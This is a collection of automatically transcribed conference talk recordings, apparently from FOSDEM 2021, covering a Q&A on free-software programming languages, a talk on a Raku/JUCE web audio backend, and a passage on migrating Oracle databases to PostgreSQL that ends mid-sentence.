Stuart, I think you had agreed to read off and sort of emcee some of the questions. So if anyone else has questions, feel free to put them in the chat or jump in to the audio. But Stuart. Yeah, thank you very much. So there was a thank you very much for your talk, Daniel. That was excellent. There was a comment around signatures. Would you like to expand on that the point being that they look somewhat different to the coders as expected? Yeah, and I think that that is something that is, goes into the point about sort of what you're used to at a particular organization that you can find something in, you can sort of, when a language is more flexible, you can develop a sort of house style that you are very comfortable with and then use that and it will be sort of the way the language fits your brain the best. If a language is less expressive and sort of forces you into a particular style, then you don't have that option. And so I think that that is one of the ways that an ideal for software language, you know, can leverage that expressivity is when you're not trying to make a language that can fit into the sort of huge team environment, you can make it so expressive that people can sort of find their preferred way of constructing signatures or their preferred subject-verb order or whatever it is that sort of fits their brain. Yeah, so that's what I have to say about that. Thank you very much. Now, you talked in your talk, you were talking about having the difference between a larger team and a smaller team. What about people who are working by themselves in a community? How does that relate? So I mean, I think I would describe someone who's working. Let me ask a clarifying question. Do you mean working by themselves in a community? You mean someone who's working by themselves but accepting contributions from other people in a community or building a tool that will be used by other people in the community? What do you mean by in a community? Yeah, so someone who's working by themselves may be contributing to a community piece of software rather than being a small team or a larger team. Okay, yeah. So I mean, I think to some extent it depends on the size of the team working on the software as a whole. So like even if many of the people who are contributing code to the Rackudo compiler are working by themselves physically. I would describe that as a larger team project because it does have a number of different people and like you need to have a cohesive style. But when you have something like Impress that I talked about in the presentation where it is collaborative in the sense that it is out there for everyone to use and accept pull requests, but the majority of the code is done by just one or two or three or four people. I would describe that as a small team project. Right. Thank you very much. There was another comment about Rackit. So you're familiar with Rackit and that may have a similar approach to Rackit. I think it does. I presented a dichotomy in this talk between languages that come out of sort of big tech and the sort of ideal programming language for free software and that is an important dichotomy. There's sort of a third category that I skipped in the interest of time and that is languages that come out of academia. And I would put Rackit in that category which I think has a lot of overlap with languages that are good for free software but some subtle differences. And I really like Rackit but I think that it is not as much an ideal free software language but for different reasons that I don't have a huge amount of space. That would probably be another interesting talk to contrast the ideal academic language with the ideal free software language. But I would put Rackit more on the academic side of the spectrum although it does have a good job of hitting many of the values that I think are important for free software language. Okay. Thank you very much. So considering that Rackit and Pearl don't have corporate ownership, what are the biggest downsides where the languages you've talked about have downsides may be about being written to solve Google's problems. What are the downsides about not having that corporate big tech leader direction? Well, I mean when I think it really comes down to resources, Larry Wall, when talking about the effort to write what became Raku said, the old saying is you've got to do it cheap, faster, good, pick two and in free software we knew we had to do it cheap because we didn't have the resources to throw at it. So then we were really left with just pick one between good and fast and I think anyone who followed the story of Pearl 6 development and then Raku development knew that they picked good over fast in terms of not speed of the program but speed of delivering their language and I think that was a good point.
Many programming languages have been explicitly designed to solve the problems of "programming in the large" – that is, to make it easier for large groups of software developers to work together, despite differences in skill, experience, or history with the project. Languages following this pattern are an excellent fit for the sort of large software companies that typically sponsor their development. However, they are not necessarily a good fit for typical free/open-source software projects, which face different challenges and constraints. If a language were designed from the ground up to fit the free-software usecase, what would it look like? What values would it maximize, what tradeoffs would it be willing to make, and what would it be like to program in every day?
10.5446/53257 (DOI)
Hello friends, my name is Konstantin, I am from Moscow, Russia, and today we'll perform the talk about web audio services development. Actually, this is mostly about creating, configuring and deploying web audio services software with Rockwell. But in the beginning of this talk, I would like to introduce myself to say a few words about me. My general interests are related to real-time programming, multi-fitted systems, low-level programming like drivers, real-time operating systems, components, and whatever. I'm working on a critical software verification, test automation, and modeling. On the other hand, I am a very enthusiast, not actually a crypto-cars holder, but I think blockchain technology researcher and developer. Over five years from this way, I have an experience with the different internal related features like centralized projects, different applications, smart contracts, node and network setup, and deployment as well. Also, I have been involved into the Rocco ecosystem. I'm a maintainer and contributor of a few Rocco modules like Road to Right, Elsevier, Revoluted, NetEthereum, and FIX. Previously, I've taken part in a few Pearl workshops and conferences. Maybe you know me, maybe we have met anywhere. So that's okay. And the summer is over. I think we should start with my presentation. I will share my screen. Okay. It's the first slide, a title. The topic, the talk topic is the programming digital audio server backend with Rocco. So actually, it's about how to build web auto service with Rocco as main programming language. Let's start. In the beginning, I would like to discuss the subject of opinion about what are the web audio services now. The COVID-19 reality give them a new life, I think. When we have such things like self-isolation, social distances, lockdowns, people prefer to stay at home. And it's good. We should keep in mind that if they have been involved in the creativity process before the pandemic, now they are online and want to continue work from home, continue to do usual record sessions, for example, rehearsals, they were from their laptops, tablets, and phones. In this reality, we have a big interest for online services for creativity, especially services for musicians, doppers, actors, and other creative people. Creative audio services are working on server or cloud, and provide a set of tools like artificial intelligence composers, stylistic classifiers, luxurious scanners, and content reviewers. Core features are sound processing or synthesizing on server and client side. Today, we have more or less reached out to support for clients, I mean on client side in the browsers. It's web audio IP technology, JavaScript libraries, modern JavaScript libraries like Atom.js and Wave.js. And what to choose to process sound on client or to process sound on the server side. And to resolve this question, we should consider cases. Processing on client is good if your web servers work on a single peer-to-peer connection model. I mean, of course, you can have many clients online and we suppose that all of them are independent and do not communicate to each other. In this case, all audio processing should be performed in a browser. But server side processing is good for the next cases. For example, you have a proprietary algorithms which you don't want to share with someone. The next case, you have a many-to-many client communication model. For example, you need to mix audio streams from the few clients and work as a tool menu resource. In this case, you need to have a central server that will perform these procedures. And the third case is you have specific devices attached to a server. The basic is digital sound processors or some hardware symbols for a specific algorithm. For example, for ear solver or transition function solver or something like that. Also you should keep in mind the client side processing is good for decentralized tasks and server side is perfect for cases with arbitrary control with cases where you need a central server. Okay, let's say in this talk we are considering the server side processing as well. And we should know what specific are on server side. First and the basic is the main operating system on server is Linux. If you have experience with audio processing, with audio programming, you know, Linux is one of the most unsupported platforms. The next thing you should keep in mind is there is no graphical interface on server. We have no any dialects, windows, widgets, and so on. And the last thing, the last valuable thing is that we have only TCP transport on server. We should pass all traffic through the HTTP and HTTPS. That's the thing we should keep in mind. But the good is that the server for audio processing is much more flexible. As I have said on the client, we use browser features or JS libraries, JavaScript libraries based on these features. But on server side, we could use anything. We could use native libraries. We could use platform. We could perform driver calls to the server devices. And we actually on server have much more abilities to our requirements. So here I will introduce a new term. It's a headless audio backend, the generic software, the generic server side software. Also want to fix your attention, we can combine the server side and client side processing. This is very positive approach and something we should do something on client and do something on server. And we should, we will consider these cases in the store. Okay, what is, what actually is headless audio backend? It has at least two layers. It's a generic, it's a main layers. It's a client service, not a service in a, like a Linux service or Windows service. It's a, some kind of software that serves the client, serves the clients. And the next thing you think is the audio engine. As I said, service client service is something like front line of backend. It speaks with browsers and performs full stack of client management. Audio authorization, configuration, streaming, and whatever. And the audio engine is a hardware server side software and perform the old digital single processing features. It can be implemented as an active or passive service and we will consider these cases below. The new term is a ABC schema. On the previous side, we have spoken about two components. It's a client servers and audio engine. But the next thing is to consider the more complicated view of headless backend. We adding the new entity, it's balancer. This software entity is between the audio engine and client service. The main goal of balancer is to reduce the load of audio engine. In some cases, we do not need to use balancer. For example, in simple services where there are only one audio engine. But if you have a cloud of cloud processing service, for example, network of audio engines, we need a balancer. We have to use a balancer. And this will manage and in this case balancer will manage tasks inside our network. It should distribute tasks over the audio engines. What actually is the audio engine? I will consider passive audio engine as a shared library in this talk. This shared library will have a set of audio processing features like a fast forward transform algorithm or inverse fast forward transform algorithms, resemble function, normalize function, transfer function, spectrum creator and different others. If it has specific devices connected to our server, audio engine should have a layer with driver calls or in line assembly. Also I should mention that audio engines are traditionally written in hyper-formal languages like C and C++. What is balancer? Let's consider the modestyles about the balancer. We will start with cases. First case, for example, we have single audio engine. In this case, we don't need the balancer. We have some profit if we have a multi-core platform. Balancer can execute runners in parallel processes and on independent CPU cores. Here we will have a little profit. The next case, we have a few audio engines on independent servers or on independent visual environments. Balancer should manage the task over the servers and run them on different cores if it is possible. It is the basic use of balancer. The third case is when we have a special hardware attached to our server for specific tasks. Here the balancer should understand what tasks could be processed on this device, communicate with this device and push the task on it. For example, if we have a hardware solver for free-air transform, balancer understands this task has free-air transform inside and should be solved on the hardware devices. So it will run as a stack of driver calls, push tasks to the device and fix the results. This is the main functionality of the balancer. So all these cases, suppose the balancer with functionality of task manager, each hood has implementation of policies, of specific policies, scheduling, task fetching, all cancellations. And what about the client service or client controller? Actually, I support the regular content management system there. It should allow non-technical users to communicate with audio engine features and the specific features of content management systems are. First of all, it should have two layers, presentation and administration layers. Of course, one area of our web service is private and the other should be a public one. CMS should support templating, of course, it should be scalable or expandable and in this presentation, we will show how it's really works and how we can add new features in our CMS via modules or add-ons. It should have a rich editing tools and we don't need to mark up or write raw HTML. All we have is what you see is what you get editing tools, it's very similar to Word or another high-level text editing tools, like test editing instruments. And of course, our CMS should manage workflow, I mean, access levels, roles, potential storage management and similar things. Okay, here's a new one iteration with the terms. Previously, we spoke about the ABC, I mean, audio engine, balance or control schema and now we should define the GRP. What is GRP? ABC reflects to GRP because when we consider an ABC model, we are talking about backend software components, but GRP just defines the software. Software is complex as a programming tools, libraries and frameworks. So GRP, audio processing backend is defined as firstly, juice framework. It's fast, well-documented, new friendly audio processing framework written in C++ and C. The next thing is Raku. This is a quote from Raku website. Raku is feature-rich programming language made for at least the next 100 of years. And the third thing is Fakes. Fakes is content management system with data storing on Ethereum blockchain written in Raku. Okay, let's get an answer for the question, why we should use juice? Basically juice has a lot of components and tools related to audio processing. Also the loss of juice is all in one. I mean, if you're using this framework in your application, you get everything you need to build your application. And not actually that things are related to digital sound processing, digital signal processing. There are a lot of helpful classes and components like JSON cryptography, openGL, graphical user interface and other handy things. Also we can create console application with juice for shared library as well. That's very important in relation to our talk because we use web service, we use passive web service based on shared library. But the bet is that juice has last license restrictions. If you use this framework in the commercial purposes, you should pay to juice guys. So keep in mind this thing when you are creating the roadmap of your startup or starting the development of some web service. Why Raku? The next question, why Raku? The answer, it's made for at least next 100 years. But seriously, Raku has very intuitive, clear native call layer for integration with third party libraries or application. I have experience with SWEAK, nice adapter for Pearl 5 and JNI. It's Java native interface also supports calling libraries in other languages from Java. And well, my opinion is Raku has one of the simplest implementation. C language is quite nice supported by Raku native call, but C++ is marked like experimental and not well tested and developed. But we use it. We use Raku like for adapter for C++ libraries and there is a great how to buy and you should have how to with explanation how to use native calls to C++ library link is provided on the slide and you can roast it later, see what happens there. Okay. Why Fakes? As I like to say, Fakes is the first CMS in the world with data storing and blockchain and recent in Raku. Yeah, that's true. And this is the thing why it should be used in audio web services. In this industry copyright, questions are very important and blockchain technology provides mechanism to store data and to guarantee that data is kept unchanged, uncorrupt and validated. Simple example. The band is recording the track online and during one of the record sessions, someone from the members proposes music phrase or riff. We can store this event as metadata on the blockchain and in the future it could be used to prove the author rights or could be used to incorporate this. Also Fakes now at the better release, it was announced on 25th January and the basic question why Fakes? I answer why not? Let's stop on the integration point. In GRP concept, Raku is the glue for audio server backend components. Also we can consider this language as a tool for creating high level adapters for juice audio engine. I'm interested to add it in this case. The front server backend component is Fakes. I mean client service. When audio engine adapter connects to Fakes as addon or external modular. The Fakes, addons or modular should be implemented according to specific guidelines. Addons are the regular Raku modules. It's a simple Raku module but they should be set up in a Fakes global configuration file. I will speak about this later. If we need to integrate some audio engine features to our backend, we just write a new module covering required audio engine IP and install the service and it should work. Now we are starting with the practice session. As I have mentioned above, our web audio service is passive. We have no persistent workers or any active entities. We use shared library as well. The basic approach is to call single library IP on request. But if we need to batch or loop our IPs, we should extend our library with a cumulator function which performs additional logic. I mean loop or batch. Or we do loop or batch at Fakes adapter module. I mean inside the Raku module or in browser, chain of the client request. What to choose? Succeed the cases. But it usually relies on your server performance, the first thing, bandwidth and current web service load. So maybe there are some cases where you should combine these methods. I mean the chain of request and cumulator function on the backend. It should possible. I think it's real. Okay. Once more, we use juice as a shared library. Juice has its own project manager. It can create projects of different types. For example, standalone application, audio plugin, console application library and whatever. For juice 4, it's quite older version or allow version. Unfortunately, there is no option to create shared libraries. So in these cases, we need to create console application and patch its make file. I'm presenting the link to the repository where this work is done. So if you use older juice frameworks, juice frameworks version, I think you need to check this link. But the better way is to use the latest version, of course. In juice 6, the current version, there is a feature to create the shared library. And there is a build option for this. So all you need is to implement your IP and run my utility. Here is the window of producer. We see the screenshot where you are creating the new project. You just select dynamic library. It's selected on this screenshot. And create library and go on. And it will. Now we will consider the example of a simple shared library. I will show how to create a simple demo library and perform its api call from Rackus. For this case, I will create a simple library with an only api call. One api call. The source code on the slide. We have a shared call that returns to the value, has no inputs, and prints current just version, just a juice framework version. It's taken from juice headers. So all we need to create a dynamic library project. All we need is to create dynamic library project. Create one source file with this code and patch make file. Cause by default, juice hides the user piece. You see on the slide, we have a visibility hidden flag. It's set by default. So I just removed this flag from make file manually, but you could comment or apply some settings inside the producer. Next we have to run make and voila. How shared library is cooked, also simple. And what about Rackus native call? As I have mentioned above, we have a great article by Andrew Sheetow how to call C, C++ for Trump from Rackus. And on the slide, I will do quick explanation. For more details, you should follow the link to the original article. In case of C++, we have to get correct simple name of our function from shared library simple table. We use an empty utility, common line utility with a graph in pipeline. It will output this common line is given on the slide and have a pink background. You should see it. It will output the line with address and complex name. You look to the slide and we will see here is address, t character and here is the complex name. Let's see what is the complex name. Under score and depth are to what the username space complex. 11 is the length of the function name. Yes, really. Just share has 11 charts. And V is a post it shows how that we have weight on the place of parameters. In other words, we have no parameter and we have a weight on the parameter in the function. Okay, what is a record test script for this is a complex simple name that we are considered on the previous slide. We should use the name in our record code. I have a simple code just record script. The name is with the pink background on the slide. And it has a trivial code. First we declare using native code. Next we define a subroutine with name just share it. As a native, we have native statement. We give the past to our shared library to the statement. And also we have a simple statement which fetched from the library with the name which fetched from the library simple table also was shown on the previous slide. And the third thing we just need to call the record subroutine. It will work. Our script will output the version of juice framework. Let's check. We see I am a juice 545 shared library. And this is exactly we have code in our C++ code. Very trivial. But of course there are a few tricks and all of them are related to the return of olives and functional arguments. Let's see. In this talk I will a few times I have spoken about web audio services. In this talk we are speaking about the frequency analyzer. As in some places I name it with different names. But this web service provides the next basic functions. First one is resampling. We need to resample from different sample rates to the etalon one. The next thing we need to write down spectrogram. Also we need to mix audio channels, do Fourier transforms, analyze the data after transforming and save analysis data in JSON. On this slide every functionality or every feature has a link to original juice documentation so you can check what component, what class is used for some features. Also we have a I provide the link to Matlab model and you can check what analysis I have done on inside my frequency with the laser. So if you are familiar with Matlab or Taf, check the link. Here is a M script that could be easily run on Matlab and you would understand it, debug it, whatever. And here is the window web view of a frequency with the laser web service. It works directly in browser. What steps should user perform to see this window? First of all we need to upload the audio file. After successful upload processing handle is run and results data are available online. Here you see two types of spectrograms. One with the more great frequency analysis and power visualization, the red one. Also you see the plot with frequency curves. It's the work of specific processing algorithm. It's the work of specific processing algorithm. But as you see there are many correlations between the plot and waveform. And well it's some kind of truth that algorithm works fine and we have two data, no NFX here. Let's speak about Raco adapter module. It has two basic requirements. First it should be installed via ZF package manager and the next of course it should cover all audio engine appease. The current appease are presented on the slide and we'll go through it for them. And they are implemented exactly as shown above. I mean native call. But we should keep an eye on a pointer type of written words and arguments. Okay we need to save spectrogram as I said. Save spectrogram apical is the simplest one. It has only argument as a file name with a string type and it turns integer as a bull type do spectrogram, does spectrogram process and save or we have an error. Also we need to resample. We have to resampling apical. If you got file with a bigger or lower sample rate we need to normalize it. It's more complicated. We have two arguments. First it's an integer sample rate and pointer to buffer to resampling. Also we have a reference to buffer as a return value. Do mixing. We need to mix left and right channels. We don't use separate channel analysis but with mixing we keep some channel specific frequencies. We don't lose anything specific data. This call is similar to do resampling but it has only argument as a reference to the buffer to mix and returns a reference to mix buffer. Do FFT. It's a simple free algorithm transform. Also we have a buffer as an input argument and return the reference to buffer as a return value. The last call is do analysis. It also takes only argument as a pointer to buffer. FFT transform it to buffer and returns a pointer to string with the JSON data with the results in JSON. Okay. Let's speak about integration. I should say a few words how FAKE works with addons. First addons are regular RACO modules. It's one point. And the second addons have a strict development guidelines. FAKE is based on hybrid CMS concepts. What is this? On one hand we have legacy CMS approach for page template output. But on other hand we use REST API for page content rendering. I mean when we are generating the main page from template, on the place of content we have a JavaScript call, another JavaScript call to backend, which retries the content from our CMS. And this is the case of Hedlis CMS. So it should be followed during modular implementation or during the modular development. Because some modular methods are CMS-independent and others will be used by CMS. Sample addon source code is presented where the links you could inspect it. But more info about addons and modules development for FAKEs you can find on our reach pages. Please check out. What is modular configuration? The basic config supposes rows. We need to set up at least three rows. First for file upload form. Second for upload files list. And third is for file details. This actually frequency is a page that we have considered a few slides before with a spectrogram and plots. As mentioned we use a row to write modular as a primary row. It has good performance and provides powerful tools for writing annotations. Check model for details link also is attached to this slide. We store the rows in JSON. As I say, rows are configurable. We store rows in JSON configuration. As a JSON configuration, here is a sample one with three rows. Three rows that we discussed on the previous slide. Every row has all paths. It's like a new row and all handlers. The default handler for each row is for page for entire page. And a page handler is handler for content. As I said before, we fetch content with additional apicole. Default handler renders the page from the plate with JS code that performs rest api request for content. This request is processed by api row and api handler as well. Let's pick a few words about the modular structure. This slide is just a summary. But they put details in our modular. Private methods should be related to just audio engine. And public methods are related on face. Also we have spoken that we should cover all just audio back and the piece. And also we should follow the same as the gar lines while during the modular development. When our modular is implemented and installed with JSF, it's available to use it from fix. But we need to say to fix, please pick it up. It's done through the configuration file. Generic configuration file. All we need is to add new K values to the installed section. To install a collection. As you see, we have frag viz. K and fix the null frequency visualizer like a class. As valid for this key. The public methods should look like. Default row methods have two arguments. Tick and much. Tick is a counter of fcgi calls. It's used because we have fcgi as a primary technology to work with the withinfakes. And much is containing row matching details. For example, you fetching some IDs, page names from this structure. It's simple hash in terms of rapid types. And appear row methods have much more arguments. Tick and much considerate buff. So let's pick about others. Row path is a simple string. Very similar to URL. And share object contains, share object argument contains references to fix inner helper objects. I should say fix have many helper objects that are available to user. I mean to color modules. For example, JSON helper object, fcgi helper object. Also have blockchain helper object. So please check our wiki pages to understand what share object you can use inside your module. And I should say it works. Yes. The live frequency with the analyzer is available now. This slide has all related links. Please check them out. First one is frequency analyzer servers is deployed on Neoruix site. The second link is analysis algorithms that are stored in separate weapon. You see Matlab model there, Matlab Octave model there. Some tickets on the algorithm validation and algorithms proposes. The third link is linked to just workaround repository. Also is a group of repositories. There are a few ones. For example, we consider it one repository where we are patching make files for older juice versions to create a short library from the console application. So check it out. And the last link, it's very interesting. You should check it because there is a fix addon integration thread. There are a few tricky questions I mentioned there. And if you're interested in how to implement modules for fix, you should, you instantly should check it out. Okay. We're at least at the end. And we'll speak about the perspective of this project. In 2019, I was at audio developers conference. And there was a great workshop about writing application with juice backend and JavaScript frontend. The idea was to use had this juice backend, had this juice backend applications and use JavaScript written graphical user interface with React and Electron, like a separate application, like a separate web application. In that case, juice backend has no GUI, but perform sound processing and sound playing. It's interesting because GUI is platform was, in this case, GUI was platform independent. It's the same on iOS, Android, Windows and other systems. But as you know, basically graphical user interface can differs from one operating system or one browsing to another. So my goal is to take this example, take this, take the example considered during this workshop and put the fix in the middle. And also the interesting and very tricky thing is to perform juice, not playing sound, but student, it to client. So client and browser. So when it takes sound from, take stream from that audio engine, juice audio engine and pass it or proxy it to the browser. Also interesting feature is interesting for me seems to save all events, all events like comment lectures from remote GUI or some hashes from audio stream, I mean pauses, I mean different things that we could make the break points on the stream, maybe some timestamps from the stream to blockchain. And it will be very interesting in fact of using blockchain and using this technology like additional logger for our performance, for our running, for our juice back-end running. So this work in progress, I think I have, I will get a new results this summer. And very, very, very hope to be at what audio developer conference for this year with the talk about the system, this web service. Well I should perform the call. Yes, I want to invite you all to juice and rock and fix the development process. Here are the links. And of course forks, code reviews are very welcome. If you like any ideas or concepts from the stock, let's get in touch and of course you could help me to keep this work on with donations. So this red panel, it's exactly about this. So if you can, please donate. So that's the end. I would like to thank Perl developer developer developer developer developer developer developer rooms organization. Sorry. It's I say hello to JJ and Stuart. I'm proud to perform this talk and there and I'm happy to be the part of the FOSDEM 21. So thank you. Thank you for your attention. Please go on if you have any questions.
Musicians, producers and composers use digital audio workstations (DAW) in daily work. You've probably seen beautiful photos from recording studios: a sound engineer is sitting in front of several monitors with multi track recording application windows and dialogs?! This is the DAW. But what's about to run DAS (Digital Audio Server): the server instance with DAW benefits + multi client access from web, compatibility with popular cloud services, FOSS and Raku-driven backend. In this lecture we will consider DAS backend as a JRP pipeline — JUCE + RAKU + PHEIX, focus on each component and demonstrate Raku as the tool for unusual daily programming tasks. When we talk about sound processing on the remote server or cloud, we assume the set of various web audio services: AI composers, recognizers (stylistic classifiers, plagiarism scanners, audio content reviewers), co-creativity, etc... Each of these services bases on headless processing and mixing audio backend. Actually this is a Digital Audio Server (similar to a DAW), providing multitrack recording, mixing and processing in real time via API. The fundamental differences between DAS and DAW are: Linux platform, no GUI and the TCP/IP stack as the only data transport. In this paradigm we can define DAS software as Linux + headless audio backend. Frontend provides visualization of processes on the backend, works in the context of web browser on client workstation and interacts with the backend via, for example, REST-API.
10.5446/53263 (DOI)
Hello and good day. I'm going to tell you what to watch out for when you want to migrate Oracle databases to Postgres. First, a little bit about me and my company, Al Kipi-Chort. I'm Lawrence Albee. I am contributor to Postgres and have worked with Postgres since 2006. I maintain the Oracle foreign data wrapper, which hopefully gives me some credibility in the field. I do support training, consulting and development for Postgres for the company Cybertech that I've been working for since 2017. Yes, my company Cybertech does exactly the things I said before. Everything for Postgres. But not only that, we also have a data science branch. So if you have anything with big data, yeah, we can also help you. Okay, we are all over the world. And so our customers, and I think that's enough, you know where to find us if you want this. I'm going to talk to you about these things. First of all, I'm going to talk about the individual steps when migrating an Oracle database to Postgres and the difficulties you can encounter there and how to overcome them. After that, I'll tell you a little bit about tools for migrating Oracle. Yes, but first the steps. In this slide, all these steps are presented in the same size, which might suggest that they are equally difficult, but that is not the case. This next slide shows the steps in what I think is a more realistic size. So what people often think is the most difficult thing migrating the data is actually technically not the biggest challenge. Usually the problems come with migrating stored code. That's what I call stored procedures, functions, packages, triggers, everything that's written in PL, SQL or Java, in the case of Oracle, and migrating the SQL code. So let's look at these steps in turn. First, something general about open source and Postgres. I don't want to go into these in detail. These are typical questions that people come up with if they have never experienced open source or they are very familiar with closed source databases like Oracle. You've probably heard them. Actually, they do not concern us so much when we get to this step where we actually want to migrate an Oracle database because by that time, those questions are typically settled. But be aware before that you'll have to face those. Some general differences between Oracle and Postgres that may hit you. First, something about transactions. On the surface, it looks pretty similar. Both databases use multi versioning and concurrency and logging look pretty much the same, not totally, but usually it's not a big problem there. Under the hood, however, Postgres and Oracle manage multi versioning quite differently. There are some advantages here on the Postgres side. For example, no problem with running out of undo table space, no snapshot to old. Rollback is instantaneous, but there are also downsides that might hurt you. In Postgres, workload with many updates is difficult because it generates a lot of dead tuples. Workloads like that require auto vacuum tuning and you even may have to do more reduce fill factor and maybe drop some indexes so that you can get hot updates to survive a heavy update workload. Another thing you have to watch out for is that table sizes will grow when you migrate to Postgres. That's because of the different multi versioning implementation that requires tuple headers for visibility. And finally, in Oracle, there's something called statement level rollback. If you have a statement inside a transaction and that statement fails, causes an error, only that one statement is rolled back, but the transaction continues. In Postgres, however, a statement that fails in a transaction aborts the whole transaction. So that's something that can hit you. You can work around that with save points, but don't be too generous with them. They have their own problems. You can deal with that problem, but you have to think about it. A little bit about synonyms, because Oracle has a pretty reduced metadata model. So there's only one schema per user and you only can access tables without schema qualification if they're in your own schema. They have invented the concept of synonyms, which are basically aliases to tables in other schemas or other objects in other schemas. We typically don't need that in Postgres because we can just set search path appropriately and the problem is gone. And for any advanced uses of synonyms, typically a view just does as well. Views also have some differences. In Oracle, you can drop a table that is used to define a view. The view then becomes invalid and trying to use it will cause an error. Postgres is more strict. It does not allow you to drop the table in that case. So you will have to change schema upgrade procedures. You have to first drop the view, then modify the table, and then create the view again. Nothing impossible, but a change in procedure. Then materialized views. The support for those in Oracle is much more sophisticated. You can have views, materialized views that are updated whenever something changes in the underlying tables and so on. You don't have any of that in Postgres. So if you need something like that, then you'll have to do it yourself, perhaps with triggers, that modify a table automatically. Table spaces are no problem. The only thing to keep in mind is don't use them in Postgres and you're good. Migrating the database schema, the big problem here is mostly data types. It's not a problem, but it's something where you have to think. The case is that there are more types in Postgres than in Oracle. So typically, there's more than one choice on the Postgres side and it can make a difference. With date, for example, dates in Oracle have our minute and second component. So you have to decide, do I want to migrate it to date and ignore those or do I want to migrate to timestamp? These decisions cannot be done automatically. So you have to do them by hand. Similar with number, everything in Oracle is number, but should it be integer, big int, double, precision, or numeric in Postgres? Also, keep in mind with that, that you need to have the same data type in Postgres for both columns if you want to have a foreign key constraint between them. In Oracle, you can have a number five column that has a foreign key reference to a number. So in that case, make sure that you translate both these columns to the same data type. And finally, large objects, lobs. That's pretty easy. There is the potential choice between byte A and large objects in Postgres, but you should always use byte A. The migration of the data. This is technically not as complicated as most people think. The big challenge here is more that this is the part of the migration that takes the longest time. So this is what determines the downtime, which is often critical. If you just dump and restore, then yes, you will have a long downtime potentially. You can reduce the time, what by parallelizing and migrating different tables in parallel, creating indexes in parallel, and so on. For more advanced users, you want something like replication between Oracle and Postgres. So it's called change data capture. You start moving the data over and at the same time, you record all the changes on the Oracle database to be able to replay them later on Postgres. And once replication is caught up, you can switch over with a little downtime. This is nice, but it's difficult and typically only get that with commercial tools. Problems with migrating the data. First and foremost are corrupted strings. These are more frequent than you might think, because if client and server encoding in Oracle are the same, you can stuff any garbage into Oracle databases and this happens. So Postgres is less forgiving about this and you will get error messages that you could have invalid byte sequences. Those have to be fixed on the source side. Second thing are zero bytes. In Oracle strings, you can have as see null as see zero bytes. These are not allowed in Postgres. Again, either fix them on the source or in this case, it's typically pretty easy to strip them away during migration. Nobody really wants those. And finally, there are infinite numbers in Oracle. They are represented with till this. If you migrate to double precision, that's easy. There's an infinity value here, but with other numeric data types, there is no such value and you'll have to think about it. Stored procedures. This is the most difficult part or the most time-consuming part in my experience. It should be simple because PLS scale, after all, is very similar to PLS scale, but it's different. So a simple example is returns versus return in function definitions. Well, that's pretty straightforward, but still, there are tools that provide automatic translation, but they are never perfect. And with more advanced problems, there will always be something that you have to do by hand. Trust me, it's never all automatic. Some frequently encountered examples. Transaction management in functions is possible in Oracle, but not in Postgres. There's some limited support for transaction management in procedures in Postgres from version 11 on, but that support is really limited and often won't do. If it is in a batched delete that people in Oracle like to do because they don't want to run out of under table space, you can just get rid of it because it doesn't matter how big a transaction is in Postgres. But in other cases, you'll have to move the logic to the application. There are also autonomous transaction Oracle. They are independent of the surrounding transaction and can be pretty useful to, for example, add a log entry to a log table, but roll back the surrounding transaction. You cannot do that in Postgres. If you don't want to move it to the application, then there is the workaround of using the DB link extension to create a database link from the database to itself and have a second transaction that way. And finally, there is bulk collect in Oracle, which is a performance improvement to fetch several rows from a cursor in one call. There is no good equivalent in Postgres, so typically, you just simplify it and process the cursor row by row. Packages are their own problem. That's a modular code in Oracle. They contain variables, type definitions, functions, and so on. We don't have that in Postgres, so it's a nice thing. One thing that you could do is you could use a closed source fork like EDBs once they support packages to some extent. There's sometimes a workaround that can help you just create schemas that have the same name as the packages and the functions from the package are moved to functions in that schema. Then the call syntax will stay the same, and often it could be a drop in replacement. Of course, that won't cover everything like global variables and so on. Also, Oracle comes with a large library for use in PLSQL. You can do anything, send emails, send HTTP requests from stored procedures. We don't have that. Either move the code to the application or re-implement it in Python or Perl, which can be used in the database in Postgres. To some small extent, the extension or FCE will provide some compatibility that makes migration easier. Migrating triggers is pretty straightforward, usually all you have to think about is that in Oracle, the code is part of the create trigger statement, whereas in Postgres, there is the trigger function and the create trigger statement. So it's typically a pretty mechanical translation, but you have to do it. Sometimes you can do without the trigger. If it's just a trigger that sets a value from a sequence, then you can get away with the default clause in Postgres, simplify everything. One thing that we do not have in Postgres yet are log-on triggers, that is code that runs after a database session has been established. You have to move that to the application. Yeah, SQL. Where does SQL occur? Not only in application code, which we would expect, but also in view definitions, of course, inside PL SQL code, then column default clauses and index definitions can also contain SQL statements, not statements, but constructs, expressions. Often SQL is SQL, one would think, but there are dialects and very often you will have to move something, translate something, tools again may help here. I will show you the most frequent problems with translating SQL between Oracle and Postgres. This first, the outer join syntax with the plus, this weird syntax can always easily be translated to standard conforming syntax because the standard conforming syntax is actually much more powerful. It's not difficult, but it's annoying. Similar empty strings, this may be the most annoying thing. In Oracle, an empty string in a null value is the same, which wouldn't bother us except that string concatenation works differently in Oracle. If you concatenate a null value to a string, the result is not null, but the string. So null is treated like an empty string there. Now, this is annoying. So wherever there are string concatenations, you have to translate it to either concat function, which does exactly what Oracle concatenation does, or sprinkle a code with coalesce calls that replace the nulls with empty strings. Frequent and annoying problem. Current date, there are the standard functions in Oracle, but most people use sys date and sys timestamps, which are proprietary. So again, search replace, the literal replacement for sys timestamp would be clock timestamp, but sometimes current timestamp might be more appropriate. Yeah, annoying, you have to do it. And finally, sequences. You fetch the next value from a sequence in Oracle with a pseudo column called next wall, whereas in BOSKERS, you call a function next wall. Again, simple, but search and replace. Migrating the application can be hard and can be easy. It can be hard if your SQL code is composed in functions sprinkled all over your application code. Then you have to change a lot. Or it can be trivial if you have an object relational map or some other abstraction layer that ideally supports both Oracle and Postgres, then the migration can be trivial. However, even if it is trivial, you have to test thoroughly. And that's also time consuming, because some problems, some differences, for example, with transaction handling or concurrency, will only surface on this level. Everything will build fine, compile fine, run fine in a single test, but there may be weird interactions. So test everything, test it well. Finally, finally, something about the tools. There are some forks of Postgres that make life easier. There is EnterpriseDB's proprietary Postgres fork that is specifically tuned for Oracle compatibility. So that will really make it much easier, but never believe if they try to tell you that it's just a drop in replacement. It's not true. It will still be problems, but way less. Still, think twice. If you go to EnterpriseDB's closed source fork, you'll end up in a closed source cage again. So you'll be just in the same situation as you were with Oracle before, just cheaper. Do you really want that? Maybe? Okay, but think about it. Then as I said, there's the free AuraFCE extension that provides some of the Oracle functions and some replacement for packages and can make your life easier. I think very often migration is painful, and if you undergo that pain, then suffer a little more and translate a little more and end up using standard open source free Postgres and live and enjoy all the advantages of open source. It's up to you, of course. Okay, tools proper. There's Aura2PG, the most widely used open source 